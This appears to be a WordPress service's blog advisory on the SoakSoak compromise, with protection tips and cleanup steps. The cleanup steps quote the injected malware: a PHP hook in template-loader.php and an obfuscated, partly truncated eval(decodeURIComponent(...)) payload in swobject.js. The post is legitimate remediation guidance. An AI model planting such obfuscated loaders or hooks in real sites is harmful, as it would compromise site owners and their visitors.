Massive WordPress Security Breach: SoakSoak

What Is It?

Over the weekend over 11,000 WordPress websites were blacklisted by Google because they were affected by the SoakSoak vulnerability. It is estimated that over 100,000 WordPress sites were compromised by the hack. Websites affected are redirecting users to the Soaksoak domain name. You will see a page similar to this if you have been infected:

What Can You Do to Protect Your Site?

It is not yet clear exactly where the vulnerability is being exploited, but it could be related to the Revolution Slider vulnerability we highlighted a few months ago. The best protection you can have is a completely updated WordPress core, updated plugins and secure backups of your site so you can fix the issue. You may also want to look into a service such as Sucuri, which can add a firewall to protect your site.

How Do I Fix It?

If you have been infected, you can do one of two things:

1. Restore your website from a clean backup that has not been infected. This will erase the code that was inserted into your site causing the issue.
2. If you do not have a backup available, you can manually clean the two infected files, which are part of the WordPress core:

1. wp-includes/template-loader.php
Remove this block of code:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

2. wp-includes/js/swobject.js
Remove this block of code:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Once removed, you will want to login to your Google Webmaster Tools and request your site to be reviewed and de-blacklisted.

If you are a wpONcall client, we would be taking care of this for you! Let us know if you have any questions.